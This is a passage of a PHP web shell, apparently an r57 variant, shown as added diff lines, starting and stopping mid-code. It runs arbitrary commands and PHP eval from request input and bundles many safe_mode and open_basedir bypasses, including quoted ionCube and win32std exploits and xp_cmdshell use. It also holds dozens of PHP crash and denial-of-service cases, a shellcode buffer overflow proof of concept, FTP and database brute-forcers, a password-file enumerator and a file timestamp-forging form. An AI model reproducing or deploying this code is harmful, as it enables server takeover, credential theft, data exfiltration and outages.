strlen($chars_rlph); $i++){ + if($realpath=realpath($dir."/{$chars_rlph[$i]}".$end_rlph)){echo $realpath."\r\n";} + if($n_rlph<=1){continue;}; + for($j=0; $j < strlen($chars_rlph); $j++){ + if($realpath=realpath($dir."/{$chars_rlph[$i]}{$chars_rlph[$j]}".$end_rlph)){echo $realpath."\r\n";} + if($n_rlph<=2){continue;}; + for($x=0; $x < strlen($chars_rlph); $x++){ + if($realpath=realpath($dir."/{$chars_rlph[$i]}{$chars_rlph[$j]}{$chars_rlph[$x]}".$end_rlph)){echo $realpath."\r\n";} + if($n_rlph<=3){continue;}; + for($y=0; $y < strlen($chars_rlph); $y++){ + if($realpath=realpath($dir."/{$chars_rlph[$i]}{$chars_rlph[$j]}{$chars_rlph[$x]}{$chars_rlph[$y]}".$end_rlph)){echo $realpath."\r\n";} + if($n_rlph<=4){continue;}; + for($z=0; $z < strlen($chars_rlph); $z++){ + if($realpath=realpath($dir."/{$chars_rlph[$i]}{$chars_rlph[$j]}{$chars_rlph[$x]}{$chars_rlph[$y]}{$chars_rlph[$z]}".$end_rlph)){echo $realpath."\r\n";} + if($n_rlph<=5){continue;}; + for($w=0; $w < strlen($chars_rlph); $w++){ + if($realpath=realpath($dir."/{$chars_rlph[$i]}{$chars_rlph[$j]}{$chars_rlph[$x]}{$chars_rlph[$y]}{$chars_rlph[$z]}{$chars_rlph[$w]}".$end_rlph)){echo $realpath."\r\n";} + } + } + } + } + } + } + echo "\r\n Generation time: ".round(@getmicrotime()-starttime,4)." sec\r\n"; + } + else echo $lang[$language.'_text29']; + break; + + case 'test1': + $ci = @curl_init("file://".$_POST['test1_file']); + $cf = @curl_exec($ci); + echo htmlspecialchars($cf); + break; + case 'test2': + @include($_POST['test2_file']); + break; + case 'test3': + if(empty($_POST['test3_port'])) { $_POST['test3_port'] = "3306"; } + $db = @mysql_connect('localhost:'.$_POST['test3_port'],$_POST['test3_ml'],$_POST['test3_mp']); + if($db) + { + if(@mysql_select_db($_POST['test3_md'],$db)) + { + @mysql_query("DROP TABLE IF EXISTS temp_r57_table"); + @mysql_query("CREATE TABLE `temp_r57_table` ( `file` LONGBLOB NOT NULL )"); +/* @mysql_query("LOAD DATA INFILE \"".$_POST['test3_file']."\" INTO TABLE temp_r57_table");*/ + @mysql_query("LOAD DATA LOCAL INFILE \"".$_POST['test3_file']."\" INTO TABLE temp_r57_table"); + $r = @mysql_query("SELECT * FROM temp_r57_table"); + while(($r_sql = @mysql_fetch_array($r))) { echo @htmlspecialchars($r_sql[0])."\r\n"; } + @mysql_query("DROP TABLE IF EXISTS temp_r57_table"); + } + else echo "[-] ERROR! Can't select database"; + @mysql_close($db); + } + else echo "[-] ERROR! Can't connect to mysql server"; + break; + case 'test4': + if(empty($_POST['test4_port'])) { $_POST['test4_port'] = "1433"; } + $db = @mssql_connect('localhost,'.$_POST['test4_port'],$_POST['test4_ml'],$_POST['test4_mp']); + if($db) + { + if(@mssql_select_db($_POST['test4_md'],$db)) + { + @mssql_query("drop table r57_temp_table",$db); + @mssql_query("create table r57_temp_table ( string VARCHAR (500) NULL)",$db); + @mssql_query("insert into r57_temp_table EXEC master.dbo.xp_cmdshell '".$_POST['test4_file']."'",$db); + $res = mssql_query("select * from r57_temp_table",$db); + while(($row=@mssql_fetch_row($res))) + { + echo htmlspecialchars($row[0])."\r\n"; + } + @mssql_query("drop table r57_temp_table",$db); + } + else echo "[-] ERROR! Can't select database"; + @mssql_close($db); + } + else echo "[-] ERROR! Can't connect to MSSQL server"; + break; + case 'test5': + $temp=tempnam($dir, "fname"); + if (@file_exists($temp)) @unlink($temp); + $extra = "-C ".$_POST['test5_file']." -X $temp"; + @mb_send_mail(NULL, NULL, NULL, NULL, $extra); + $str = moreread($temp); + echo htmlspecialchars($str); + @unlink($temp); + break; + case 'test6': + $stream = @imap_open('/etc/passwd', "", ""); + $dir_list = @imap_list($stream, trim($_POST['test6_file']), "*"); + for ($i = 0; $i < count($dir_list); $i++) echo htmlspecialchars($dir_list[$i])."\r\n"; + @imap_close($stream); + break; + case 'test7': + $stream = @imap_open($_POST['test7_file'], "", ""); + $str = @imap_body($stream, 1); + echo htmlspecialchars($str); + @imap_close($stream); + break; + case 'test8': + $temp=@tempnam($_POST['test8_file2'], "copytemp"); + $str = readzlib($_POST['test8_file1'],$temp); + echo htmlspecialchars($str); + @unlink($temp); + break; + + case 'test9': + @ini_restore("safe_mode"); + @ini_restore("open_basedir"); + $str = moreread($_POST['test9_file']); + echo htmlspecialchars($str); + break; + case 'test10': + @ob_clean(); + $error_reporting = @ini_get('error_reporting'); + error_reporting(E_ALL ^ E_NOTICE); + @ini_set("display_errors", 1); + @ini_alter("display_errors", 1); + $str=@fopen($_POST['test10_file'],"r"); + while(!feof($str)){print htmlspecialchars(fgets($str));} + fclose($str); + error_reporting($error_reporting); + break; + case 'test11': + @ob_clean(); + $temp = 'zip://'.$_POST['test11_file']; + $str = moreread($temp); + echo htmlspecialchars($str); + break; + case 'test12': + @ob_clean(); + $temp = 'compress.bzip2://'.$_POST['test12_file']; + $str = moreread($temp); + echo htmlspecialchars($str); + break; + case 'test13': + @error_log($_POST['test13_file1'], 3, "php://../../../../../../../../../../../".$_POST['test13_file2']); + echo $lang[$language.'_text61']; + break; + case 'test14': + @session_save_path($_POST['test14_file2']."\0;$tempdir"); + @session_start(); + @$_SESSION[php]=$_POST['test14_file1']; + echo $lang[$language.'_text61']; + break; + case 'test15': + @readfile($_POST['test15_file1'], 3, "php://../../../../../../../../../../../".$_POST['test15_file2']); + echo $lang[$language.'_text61']; + + break; + case 'test_5_2_6': +echo getcwd()."\n"; +chdir($_POST['test_5_2_6']); +echo getcwd()."\n"; + break; + + + case 'test2_5_2_6': +var_dump(posix_access($_POST['test15_file1'])); + + break; + + case 'test_5_2_4': +//PHP 5.2.4 ionCube extension safe_mode and disable_functions protections bypass + +//author: shinnai +//mail: shinnai[at]autistici[dot]org +//site: http://shinnai.altervista.org + +//Tested on xp Pro sp2 full patched, worked both from the cli and on apache + +//Technical details: +//ionCube version: 6.5 +//extension: ioncube_loader_win_5.2.dll (other may also be vulnerable) +//url: www.egyspider.eu + +//php.ini settings: +//safe_mode = On +//disable_functions = ioncube_read_file, readfile + +//Description: +//This is useful to obtain juicy informations but also to retrieve source +//code of php pages, password files, etc... you just need to change file path. +//Anyway, don't worry, nobody will read your obfuscated code :) + +//greetz to: BlackLight for help me to understand better PHP + +//P.S. +//This extension contains even an interesting ioncube_write_file function... + +if (!extension_loaded("ionCube Loader")) die("ionCube Loader extension required! You are now can establish any order"); + +$path = str_repeat("..\\", 20); + +$MyBoot_readfile = readfile($path."windows\\system.ini"); #just to be sure that I set correctely disable_function :) + +$MyBoot_ioncube = ioncube_read_file($path."boot.ini"); + +echo $MyBoot_readfile; + +echo "<br><br>ionCube output:<br><br>"; + +echo $MyBoot_ioncube; + break; + + + + case 'egy_perl': +if(!extension_loaded('perl'))die('perl extension is not loaded'); +if(!isset($_GET))$_GET=&$HTTP_GET_VARS; +if(empty($_GET['cmd']))$_GET['cmd']=(strtoupper(substr(PHP_OS,0,3))=='WIN')?'dir':'ls'; +$perl=new perl(); +echo "<textarea rows='25' cols='75'>"; +$perl->eval("system('".$_GET['cmd']."')"); +echo "</textarea>"; +$_GET['cmd']=htmlspecialchars($_GET['cmd']); + break; + + break; + case 'egy_4_2_0': + for ($i = 0; $i < 60000; $i++) + { + if (($tab = @posix_getpwuid($i)) != NULL) + { + echo $tab['name'].":"; + echo $tab['passwd'].":"; + echo $tab['uid'].":"; + echo $tab['gid'].":"; + echo $tab['gecos'].":"; + echo $tab['dir'].":"; + echo $tab['shell']."<br>"; + } + } + break; + + + case 'egy_5_2_3': +//PHP 5.2.3 win32std extension safe_mode and disable_functions protections bypass + +//author: egy spider +//mail: egy_spider@hotmail.com +//site: http://egyspider.eu + +//Tested on xp Pro sp2 full patched, worked both from the cli and on apache + +//Thanks to rgod for all his precious advises :) + +//I set php.ini in this way: +//safe_mode = On +//disable_functions = system +//if you launch the exploit from the cli, cmd.exe will be wxecuted +//if you browse it through apache, you'll see a new cmd.exe process activated in taskmanager + +if (!extension_loaded("win32std")) die("win32std extension required!"); +system("cmd.exe"); //just to be sure that protections work well +win_shell_execute("..\\..\\..\\..\\windows\\system32\\cmd.exe"); + break; + + break; + + + case 'test16': + if (@fopen('srpath://../../../../../../../../../../../'.$_POST['test16_file'],"a")) echo $lang[$language.'_text61']; + break; + case 'test17_1': + @unlink('symlinkread'); + @symlink('a/a/a/a/a/a/', 'dummy'); + @symlink('dummy/../../../../../../../../../../../'.$_POST['test17_file'], 'symlinkread'); + @unlink('dummy'); + while (1) + { + @symlink('.', 'dummy'); + @unlink('dummy'); + } + break; + case 'test17_2': + $str=''; + while (strlen($str) < 3) { +/* $str = moreread('symlinkread');*/ + $str = @file_get_contents('symlinkread'); + if($str){ @ob_clean(); echo htmlspecialchars($str);} + } + break; + case 'test17_3': + $dir = $files = array(); + if(@version_compare(@phpversion(),"5.0.0")>=0){ + while (@count($dir) < 3) { + $dir=@scandir('symlinkread'); + if (@count($dir) > 2) {@ob_clean(); @print_r($dir); } + } + } + else { + while (@count($files) < 3) { + $dh = @opendir('symlinkread'); + while (false !== ($filename = @readdir($dh))) { + $files[] = $filename; + } + if(@count($files) > 2){@ob_clean(); @print_r($files); } + } + } + break; + case 'test18': + @putenv("TMPDIR=".$_POST['test18_file2']); + @ini_set("session.save_path", ""); + @ini_alter("session.save_path", ""); + @session_start(); + @$_SESSION[php]=$_POST['test18_file1']; + echo $lang[$language.'_text61']; + break; + case 'test19': + if(empty($_POST['test19_port'])) { $_POST['test19_port'] = "3306"; } + $m = new mysqli('localhost',$_POST['test19_ml'],$_POST['test19_mp'],$_POST['test19_md'],$_POST['test19_port']); + if(@mysqli_connect_errno()){ echo "[-] ERROR! Can't connect to mysqli server: ".mysqli_connect_error() ;}; + $m->options(MYSQLI_OPT_LOCAL_INFILE, 1); + $m->set_local_infile_handler("r"); + $m->query("DROP TABLE IF EXISTS temp_r57_table"); + $m->query("CREATE TABLE temp_r57_table ( 'file' LONGBLOB NOT NULL )"); + $m->query("LOAD DATA LOCAL INFILE \"".$_POST['test19_file']."\" INTO TABLE temp_r57_table"); + $r = $m->query("SELECT * FROM temp_r57_table"); + while(($r_sql = @mysqli_fetch_array($r))) { echo @htmlspecialchars($r_sql[0])."\r\n"; } + $m->query("DROP TABLE IF EXISTS temp_r57_table"); + $m->close(); + break; + } +} + +if((!$safe_mode) && ($_POST['cmd']!="php_eval") && ($_POST['cmd']!="mysql_dump") && ($_POST['cmd']!="db_query") && ($_POST['cmd']!="ftp_brute") && ($_POST['cmd']!="db_brute")){ + $cmd_rep = ex($_POST['cmd']); + if(!$unix) { echo @htmlspecialchars(@convert_cyr_string($cmd_rep,'d','w'))."\n"; } + else { echo @htmlspecialchars($cmd_rep)."\n"; } +}/*elseif($safe_mode){ + $cmd_rep = safe_ex($_POST['cmd']); + if(!$unix) { echo @htmlspecialchars(@convert_cyr_string($cmd_rep,'d','w'))."\n"; } + else { echo @htmlspecialchars($cmd_rep)."\n"; } +} +*/ + +switch($_POST['cmd']) +{ + case 'dos1': + function a() { a(); } a(); + break; + case 'dos2': + @pack("d4294967297", 2); + break; + case 'dos3': + $a = "a";@unserialize(@str_replace('1', 2147483647, @serialize($a))); + break; + case 'dos4': + $t = array(1);while (1) {$a[] = &$t;}; + break; + case 'dos5': + @dl("sqlite.so");$db = new SqliteDatabase("foo"); + break; + case 'dos6': + preg_match('/(.(?!b))*/', @str_repeat("a", 10000)); + break; + case 'dos7': + @str_replace("A", str_repeat("B", 65535), str_repeat("A", 65538)); + break; + case 'dos8': + @shell_exec("killall -11 httpd"); + break; + case 'dos9': + function cx(){ @tempnam("/www/", '../../../../../..'.$tempdir.'cx'); cx(); } cx(); + break; + case 'dos10': + $a = @str_repeat ("A",438013);$b = @str_repeat ("B",951140);@wordwrap ($a,0,$b,0); + break; + case 'dos11': + @array_fill(1,123456789,"Infigo-IS"); + break; + case 'dos12': + @substr_compare("A","A",12345678); + break; + case 'dos13': + @unserialize("a:2147483649:{"); + break; + case 'dos14': + $Data = @str_ireplace("\n", "<br>", $Data); + break; + case 'dos15': + function toUTF($x) {return chr(($x >> 6) + 192) . chr(($x & 63) + 128);} + $str1 = "";for($i=0; $i < 64; $i++){ $str1 .= toUTF(977);} + @htmlentities($str1, ENT_NOQUOTES, "UTF-8"); + break; + case 'dos16': + $r = @zip_open("x.zip");$e = @zip_read($r);$x = @zip_entry_open($r, $e); + for ($i=0; $i<1000; $i++) $arr[$i]=array(array("")); + unset($arr[600]);@zip_entry_read($e, -1);unset($arr[601]); + break; + case 'dos17': + $z = "UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU"; + $y = "DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD"; + $x = "AQ "; + unset($z);unset($y);$x = base64_decode($x);$y = @sqlite_udf_decode_binary($x);unset($x); + break; + case 'dos18': + $MSGKEY = 519052;$msg_id = @msg_get_queue ($MSGKEY, 0600); + if (!@msg_send ($msg_id, 1, 'AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHH', false, true, $msg_err)) + echo "Msg not sent because $msg_err\n"; + if (@msg_receive ($msg_id, 1, $msg_type, 0xffffffff, $_SESSION, false, 0, $msg_error)) { + echo "$msg\n"; + } else { echo "Received $msg_error fetching message\n"; break; } + @msg_remove_queue ($msg_id); + break; + case 'dos19': + $url = "php://filter/read=OFF_BY_ONE./resource=/etc/passwd"; @fopen($url, "r"); + break; + case 'dos20': + $hashtable = str_repeat("A", 39); + $hashtable[5*4+0]=chr(0x58);$hashtable[5*4+1]=chr(0x40);$hashtable[5*4+2]=chr(0x06);$hashtable[5*4+3]=chr(0x08); + $hashtable[8*4+0]=chr(0x66);$hashtable[8*4+1]=chr(0x77);$hashtable[8*4+2]=chr(0x88);$hashtable[8*4+3]=chr(0x99); + $str = 'a:100000:{s:8:"AAAABBBB";a:3:{s:12:"0123456789AA";a:1:{s:12:"AAAABBBBCCCC";i:0;}s:12:"012345678AAA";i:0;s:12:"012345678BAN";i:0;}'; + for ($i=0; $i<65535; $i++) { $str .= 'i:0;R:2;'; } + $str .= 's:39:"XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX";s:39:"'.$hashtable.'";i:0;R:3;'; + @unserialize($str); + break; + case 'dos21': + imagecreatetruecolor(1234,1073741824); + break; + case 'dos22': + imagecopyresized(imagecreatetruecolor(0x7fffffff, 120),imagecreatetruecolor(120, 120), 0, 0, 0, 0, 0x7fffffff, 120, 120, 120); + break; + case 'dos23': + $a = str_repeat ("A",9989776); $b = str_repeat("/", 2798349); iconv_substr($a,0,1,$b); + break; + case 'dos24': + setlocale(LC_COLLATE, str_repeat("A", 34438013)); + break; + case 'dos25': + glob(str_repeat("A", 9638013)); + break; + case 'dos26': + glob("a",-1); + break; + case 'dos27': + fnmatch("*[1]e", str_repeat("A", 9638013)); + break; + case 'dos28': + if (extension_loaded("gd")){ $buff = str_repeat("A",9999); $res = imagepsloadfont($buff); echo "boom!!\n";} + break; + case 'dos29': + if(function_exists('msql_connect')){ msql_pconnect(str_repeat('A',49424).'BBBB'); msql_connect(str_repeat('A',49424).'BBBB');} + break; + case 'dos30': + $a=str_repeat("A", 65535); $b=1; $c=str_repeat("A", 65535); chunk_split($a,$b,$c); + break; + case 'dos31': + if (extension_loaded("win32std") ) { win_browse_file( 1, NULL, str_repeat( "\x90", 264 ), NULL, array( "*" => "*.*" ) );} + break; + case 'dos32': + if (extension_loaded( "iisfunc" ) ){ $buf_unicode = str_repeat( "A", 256 ); $eip_unicode = "\x41\x41"; iis_getservicestate( $buf_unicode . $eip_unicode );} + break; + case 'dos33': + $buff = str_repeat("\x41", 250);$get_EIP = "\x42\x42";$get_ESP = str_repeat("\x43", 100);$get_EBP = str_repeat("\x44", 100);ntuser_getuserlist($buff.$get_EIP.$get_ESP.$get_EBP); + break; + case 'dos34': + if (extension_loaded("bz2")){ $buff = str_repeat("a",1000); com_print_typeinfo($buff);} + break; + case 'dos35': + $a = str_repeat("/", 4199000); iconv(1, $a, 1); + break; + case 'dos36': + $a = str_repeat("/", 2991370); iconv_mime_decode_headers(0, 1, $a); + break; + case 'dos37': + $a = str_repeat("/", 3799000); iconv_mime_decode(1, 0, $a); + break; + case 'dos39': + sprintf("[%'A2147483646s]\n", "A"); + break; + break; + case 'dos40': +// PHP <= 4.4.6 mssql_connect() & mssql_pconnect() local buffer overflow +// poc exploit (and safe_mode bypass) +// windows 2000 sp3 en / seh overwrite +// by rgod +// site: http://egyspider.eu + +// u can easily adjust for php5 +// this as my little contribute to MOPB + +$____scode= +"\xeb\x1b". +"\x5b". +"\x31\xc0". +"\x50". +"\x31\xc0". +"\x88\x43\x59". +"\x53". +"\xbb\xca\x73\xe9\x77". //WinExec +"\xff\xd3". +"\x31\xc0". +"\x50". +"\xbb\x5c\xcf\xe9\x77". //ExitProcess +"\xff\xd3". +"\xe8\xe0\xff\xff\xff". +"\x63\x6d\x64". +"\x2e". +"\x65". +"\x78\x65". +"\x20\x2f". +"\x63\x20". +"start notepad & "; + + $eip="\xdc\xf5\x12"; + $____suntzu=str_repeat("\x90",100); + $____suntzu.=$____scode; + $____suntzu.=str_repeat("a",2460 - strlen($____scode)); + $____suntzu.=$eip; + break; + case 'zend': + if(empty($_POST['zend'])){ +} else { + +$dezend=$_POST['zend']; +include($_POST['zend']); +print_r($GLOBALS); +require_once("$dezend"); +echo "</textarea></p>"; +} +break; + case 'dos38': + $a = str_repeat("/", 9791999); iconv_strlen(1, $a); + break; +} +if ($_POST['cmd']=="php_eval"){ + $eval = @str_replace("<?","",$_POST['php_eval']); + $eval = @str_replace("?>","",$eval); + @eval($eval);} + +if ($_POST['cmd']=="ftp_brute") + { + $suc = 0; + if($_POST['brute_method']=='passwd'){ + foreach($users as $user) + { + $connection = @ftp_connect($ftp_server,$ftp_port,10); + if(@ftp_login($connection,$user,$user)) { echo "[+] $user:$user - success\r\n"; $suc++; } + else if(isset($_POST['reverse'])) { if(@ftp_login($connection,$user,strrev($user))) { echo "[+] $user:".strrev($user)." - success\r\n"; $suc++; } } + @ftp_close($connection); + } + }else if(($_POST['brute_method']=='dic') && isset($_POST['ftp_login'])){ + foreach($users as $user) + { + $connection = @ftp_connect($ftp_server,$ftp_port,10); + if(@ftp_login($connection,$_POST['ftp_login'],$user)) { echo "[+] ".$_POST['ftp_login'].":$user - success\r\n"; $suc++; } + @ftp_close($connection); + } + } + echo "\r\n-------------------------------------\r\n"; + $count = count($users); + if(isset($_POST['reverse']) && ($_POST['brute_method']=='passwd')) { $count *= 2; } + echo $lang[$language.'_text97'].$count."\r\n"; + echo $lang[$language.'_text98'].$suc."\r\n"; + } + +if ($_POST['cmd']=="db_brute") + { + $suc = 0; + if($_POST['brute_method']=='passwd'){ + foreach($users as $user) + { + $sql = new my_sql(); + $sql->db = $_POST['db']; + $sql->host = $_POST['db_server']; + $sql->port = $_POST['db_port']; + $sql->user = $user; + $sql->pass = $user; + if($sql->connect()) { echo "[+] $user:$user - success\r\n"; $suc++; } + } + if(isset($_POST['reverse'])) + { + foreach($users as $user) + { + $sql = new my_sql(); + $sql->db = $_POST['db']; + $sql->host = $_POST['db_server']; + $sql->port = $_POST['db_port']; + $sql->user = $user; + $sql->pass = strrev($user); + if($sql->connect()) { echo "[+] $user:".strrev($user)." - success\r\n"; $suc++; } + } + } + }else if(($_POST['brute_method']=='dic') && isset($_POST['mysql_l'])){ + foreach($users as $user) + { + $sql = new my_sql(); + $sql->db = $_POST['db']; + $sql->host = $_POST['db_server']; + $sql->port = $_POST['db_port']; + $sql->user = $_POST['mysql_l']; + $sql->pass = $user; + if($sql->connect()) { echo "[+] ".$_POST['mysql_l'].":$user - success\r\n"; $suc++; } + } + } + echo "\r\n-------------------------------------\r\n"; + $count = count($users); + if(isset($_POST['reverse']) && ($_POST['brute_method']=='passwd')) { $count *= 2; } + echo $lang[$language.'_text97'].$count."\r\n"; + echo $lang[$language.'_text98'].$suc."\r\n"; + } + +if ($_POST['cmd']=="mysql_dump") + { + if(isset($_POST['dif'])) { morewrite($_POST['dif_name'], "mysql_dump\r\n"); } + $sql = new my_sql(); + $sql->db = $_POST['db']; + $sql->host = $_POST['db_server']; + $sql->port = $_POST['db_port']; + $sql->user = $_POST['mysql_l']; + $sql->pass = $_POST['mysql_p']; + $sql->base = $_POST['mysql_db']; + if(!$sql->connect()) { echo "[-] ERROR! Can't connect to SQL server"; } + else if(!$sql->select_db()) { echo "[-] ERROR! Can't select database"; } + else if(!$sql->dump($_POST['mysql_tbl'])) { echo "[-] ERROR! Can't create dump"; } + else { + if(empty($_POST['dif'])) { foreach($sql->dump as $v) echo $v."\r\n"; } + else if(@is_writable($_POST['dif_name'])){ foreach($sql->dump as $v){ morewrite($_POST['dif_name'], $v."\r\n");} } + else { echo "[-] ERROR! Can't write in dump file"; } + } + } + +echo "</textarea></div>"; +echo "</b>"; +echo "</td></tr></table>"; +echo "<table width=100% cellpadding=0 cellspacing=0>"; + +function div_title($title, $id) +{ + return '<a style="cursor: pointer;" onClick="change_divst(\''.$id.'\');">'.$title.'</a>'; +} +function div($id) + { + if(isset($_COOKIE[$id]) && ($_COOKIE[$id]==0)) return '<div id="'.$id.'" style="display: none;">'; + $divid=array('id5','id6','id8','id9','id10','id11','id16','id24','id25','id26','id27','id28','id29','id33','id34','id35','id37','id38','id39'); + if(empty($_COOKIE[$id]) && @in_array($id,$divid)) return '<div id="'.$id.'" style="display: none;">'; + return '<div id="'.$id.'">'; + } + +if(!$safe_mode){ +echo $fs.$table_up1.div_title($lang[$language.'_text2'],'id1').$table_up2.div('id1').$ts; +echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','cmd',85,'')); +echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1'])); +echo $te.'</div>'.$table_end1.$fe; +} +else{ +echo $fs.$table_up1.div_title($lang[$language.'_text28'],'id2').$table_up2.div('id2').$ts; +echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).in('hidden','cmd',0,'safe_dir').ws(4).in('submit','submit',0,$lang[$language.'_butt6'])); +echo $te.'</div>'.$table_end1.$fe; +} +echo $fs.$table_up1.div_title($lang[$language.'_text42'],'id3').$table_up2.div('id3').$ts; +echo sr(15,"<b>".$lang[$language.'_text43'].$arrow."</b>",in('text','e_name',85,$dir).in('hidden','cmd',0,'edit_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt11'])); +echo $te.'</div>'.$table_end1.$fe; + + + + + + + +echo $fs.$table_up1.div_title($lang[$language.'_text210'],'id20').$table_up2.div('id20').$ts; +echo "<table class=table1 width=100% align=center>"; +echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','zend',85,(!empty($_POST['zend'])?($_POST['zend']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'zend').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; + +{ +echo $fs.$table_up1.div_title($lang[$language.'_text57'],'id4').$table_up2.div('id4').$ts; +echo sr(15,"<b>".$lang[$language.'_text58'].$arrow."</b>",in('text','mk_name',54,(!empty($_POST['mk_name'])?($_POST['mk_name']):("new_name"))).ws(4)."<select name=action><option value=create>".$lang[$language.'_text65']."</option><option value=delete>".$lang[$language.'_text66']."</option></select>".ws(3)."<select name=what><option value=file>".$lang[$language.'_text59']."</option><option value=dir>".$lang[$language.'_text60']."</option></select>".in('hidden','cmd',0,'mk').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt13'])); +echo $te.'</div>'.$table_end1.$fe; +} + +if($unix && @function_exists('touch')){ +echo $fs.$table_up1.div_title($lang[$language.'_text128'],'id5').$table_up2.div('id5').$ts; +echo sr(15,"<b>".$lang[$language.'_text43'].$arrow."</b>",in('text','file_name',40,(!empty($_POST['file_name'])?($_POST['file_name']):($_SERVER["SCRIPT_FILENAME"]))) +.ws(4)."<b>".$lang[$language.'_text26'].ws(2).$lang[$language.'_text59'].$arrow."</b>" +.ws(2).in('text','file_name_r',40,(!empty($_POST['file_name_r'])?($_POST['file_name_r']):("")))); +echo sr(15,"<b> or set Day".$arrow."</b>", +' +<select name="day" size="1"> +<option value="01">1</option> +<option value="02">2</option> +<option value="03">3</option> +<option value="04">4</option> +<option value="05">5</option> +<option value="06">6</option> +<option value="07">7</option> +<option value="08">8</option> +<option value="09">9</option> +<option value="10">10</option> +<option value="11">11</option> +<option value="12">12</option> +<option value="13">13</option> +<option value="14">14</option> +<option value="15">15</option> +<option value="16">16</option> +<option value="17">17</option> +<option value="18">18</option> +<option value="19">19</option> +<option value="20">20</option> +<option value="21">21</option> +<option value="22">22</option> +<option value="23">23</option> +<option value="24">24</option> +<option value="25">25</option> +<option value="26">26</option> +<option value="27">27</option> +<option value="28">28</option> +<option value="29">29</option> +<option value="30">30</option> +<option value="31">31</option> +</select>' +.ws(4)."<b>Month".$arrow."</b>" +.' +<select name="month" size="1"> +<option value="January">January</option> +<option value="February">February</option> +<option value="March">March</option> +<option value="April">April</option> +<option value="May">May</option> +<option value="June">June</option> +<option value="July">July</option> +<option value="August">August</option> +<option value="September">September</option> +<option value="October">October</option> +<option value="November">November</option> +<option value="December">December</option> +</select>' +.ws(4)."<b>Year".$arrow."</b>" +.' +<select name="year" size="1"> +<option value="1998">1998</option> +<option value="1999">1999</option> +<option value="2000">2000</option> +<option value="2001">2001</option> +<option value="2002">2002</option> +<option value="2003">2003</option> +<option value="2004">2004</option> +<option value="2005">2005</option> +<option value="2006">2006</option> +<option value="2006">2007</option> +<option value="2006">2008</option> +<option value="2006">2009</option> +<option value="2006">2010</option> +</select>' +.ws(4)."<b>Hour".$arrow."</b>" +.' +<select name="chasi" size="1"> +<option value="01">01</option> +<option value="02">02</option> +<option value="03">03</option> +<option value="04">04</option> +<option value="05">05</option> +<option value="06">06</option> +<option value="07">07</option> +<option value="08">08</option> +<option value="09">09</option> +<option value="10">10</option> +<option value="11">11</option> +<option value="12">12</option> +<option value="13">13</option> +<option value="14">14</option> +<option value="15">15</option> +<option value="16">16</option> +<option value="17">17</option> +<option value="18">18</option> +<option value="19">19</option> +<option value="20">20</option> +<option value="21">21</option> +<option value="22">22</option> +<option value="23">23</option> +<option value="24">24</option> +</select>' +.ws(4)."<b>Minute".$arrow."</b>" +.' +<select name="minutes" size="1"> +<option value="01">1</option> +<option value="02">2</option> +<option value="03">3</option> +<option value="04">4</option> +<option value="05">5</option> +<option value="06">6</option> +<option value="07">7</option> +<option value="08">8</option> +<option value="09">9</option> +<option value="10">10</option> +<option value="11">11</option> +<option value="12">12</option> +<option value="13">13</option> +<option value="14">14</option> +<option value="15">15</option> +<option value="16">16</option> +<option value="17">17</option> +<option value="18">18</option> +<option value="19">19</option> +<option value="20">20</option> +<option value="21">21</option> +<option value="22">22</option> +<option value="23">23</option> +<option value="24">24</option> +<option value="25">25</option> +<option value="26">26</option> +<option value="27">27</option> +<option value="28">28</option> +<option value="29">29</option> +<option value="30">30</option> +<option value="31">31</option> +<option value="32">32</option> +<option value="33">33</option> +<option value="34">34</option> +<option value="35">35</option> +<option value="36">36</option> +<option value="37">37</option> +<option value="38">38</option> +<option value="39">39</option> +<option value="40">40</option> +<option value="41">41</option> +<option value="42">42</option> +<option value="43">43</option> +<option value="44">44</option> +<option value="45">45</option> +<option value="46">46</option> +<option value="47">47</option> +<option value="48">48</option> +<option value="49">49</option> +<option value="50">50</option> +<option value="51">51</option> +<option value="52">52</option> +<option value="53">53</option> +<option value="54">54</option> +<option value="55">55</option> +<option value="56">56</option> +<option value="57">57</option> +<option value="58">58</option> +<option value="59">59</option> +</select>' +.ws(4)."<b>Second".$arrow."</b>" +.' +<select name="second" size="1"> +<option value="01">1</option> +<option value="02">2</option> +<option value="03">3</option> +<option value="04">4</option> +<option value="05">5</option> +<option value="06">6</option> +<option value="07">7</option> +<option value="08">8</option> +<option value="09">9</option> +<option value="10">10</option> +<option value="11">11</option> +<option value="12">12</option> +<option value="13">13</option> +<option value="14">14</option> +<option value="15">15</option> +<option value="16">16</option> +<option value="17">17</option> +<option value="18">18</option> +<option value="19">19</option> +<option value="20">20</option> +<option value="21">21</option> +<option value="22">22</option> +<option value="23">23</option> +<option value="24">24</option> +<option value="25">25</option> +<option value="26">26</option> +<option value="27">27</option> +<option value="28">28</option> +<option value="29">29</option> +<option value="30">30</option> +<option value="31">31</option> +<option value="32">32</option> +<option value="33">33</option> +<option value="34">34</option> +<option value="35">35</option> +<option value="36">36</option> +<option value="37">37</option> +<option value="38">38</option> +<option value="39">39</option> +<option value="40">40</option> +<option value="41">41</option> +<option value="42">42</option> +<option value="43">43</option> +<option value="44">44</option> +<option value="45">45</option> +<option value="46">46</option> +<option value="47">47</option> +<option value="48">48</option> +<option value="49">49</option> +<option value="50">50</option> +<option value="51">51</option> +<option value="52">52</option> +<option value="53">53</option> +<option value="54">54</option> +<option value="55">55</option> +<option value="56">56</option> +<option value="57">57</option> +<option value="58">58</option> +<option value="59">59</option> +</select>' +.in('hidden','cmd',0,'touch') +.in('hidden','dir',0,$dir) +.ws(4).in('submit','submit',0,$lang[$language.'_butt1'])); +echo $te.'</div>'.$table_end1.$fe; +} + +$select=''; +if(@function_exists('chmod')){$select .= 